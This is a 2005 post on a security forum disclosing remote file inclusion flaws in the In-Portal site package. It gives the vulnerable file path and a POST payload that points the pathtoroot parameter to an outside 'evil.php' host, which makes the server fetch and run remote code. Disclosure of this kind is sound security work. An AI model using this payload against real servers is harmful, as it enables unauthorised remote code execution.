|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 139
Members: 0
Total: 139
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Multiple Vulnerability In-Portal.net |
|
Posted: Thu Oct 13, 2005 2:24 pm |
|
|
g0df4th3r |
Advanced user |
|
|
Joined: Sep 22, 2004 |
Posts: 52 |
Location: LV |
|
|
|
|
|
|
Multiple Vulnerability In-Portal.net
In-Portal Site Package - Price:$295
Quote: "our most popular products designed to run a successful portal or a community web site. It is equipped with the latest In-portal Platform, In-link (Directory Management), In-newz (News Management) and In-bulletin (Discussion Forum)" - in-portal.net
Credit: der4444 original advisory at hackers.by.lv
Vulnerable File:
/kernel/include/item.php
POST: pathtoroot=http://pridels.blogspot.com/evil.php?
In-Link is also vulnerable to a remote include in:
includes/init.php
BUT, php version >= 5.0 and registered globals on. Which is a rare configuration.
Greetz to New Angels team,waraxe,X-ACCESS crew
original advisory:
http://pridels.blogspot.com/2005/10/in-portalnet.html |
|
|
|
|
|
www.waraxe.us Forum Index -> Remote file inclusion
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|